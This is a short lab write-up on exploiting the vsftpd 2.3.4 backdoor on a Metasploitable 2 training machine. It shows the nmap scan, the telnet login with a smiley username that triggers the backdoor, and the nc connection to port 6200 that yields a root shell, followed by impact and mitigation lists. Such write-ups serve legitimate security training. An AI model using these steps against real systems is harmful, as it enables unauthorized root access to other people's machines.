Attack 01 — vsftpd 2.3.4 Backdoor
Metasploitable 2 Exploitation
Objective
Exploit the backdoor vulnerability in vsftpd 2.3.4 running on Metasploitable 2 to gain unauthorized access to the system. This vulnerability allows remote code execution through a malicious backdoor that was introduced in this specific version of the FTP server.
Reconnaissance
Initial port scanning revealed FTP service running on port 21. Version detection identified vsftpd 2.3.4, which is known to contain a backdoor. The backdoor can be triggered by sending a specific sequence during the FTP handshake process.
$ nmap -sV -p 21 192.168.100.20
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4Exploitation
The backdoor is activated by sending ":)" as the username during FTP login, followed by a newline character. This triggers the backdoor which opens a listening shell on port 6200. After triggering the backdoor, connect to port 6200 to gain root shell access.
$ telnet 192.168.100.20 21
Trying 192.168.100.20...
Connected to 192.168.100.20.
220 (vsFTPd 2.3.4)
USER :):)
331 Please specify the password.
PASS test
530 Login incorrect.
^]
telnet> quit
$ nc 192.168.100.20 6200
id
uid=0(root) gid=0(root)Impact
Successful exploitation results in immediate root-level access to the target system. This allows an attacker to:
- Access all files and directories
- Modify system configuration
- Install persistent backdoors
- Exfiltrate sensitive data
- Use the compromised system as a pivot point for further attacks
Mitigation
To prevent this vulnerability:
- Update vsftpd: Upgrade to version 2.3.5 or later, which removes the backdoor
- Network segmentation: Isolate FTP servers from critical network segments
- Access controls: Implement firewall rules to restrict FTP access to trusted IPs
- Monitoring: Set up intrusion detection to alert on suspicious FTP login attempts
- Regular audits: Perform security assessments to identify vulnerable services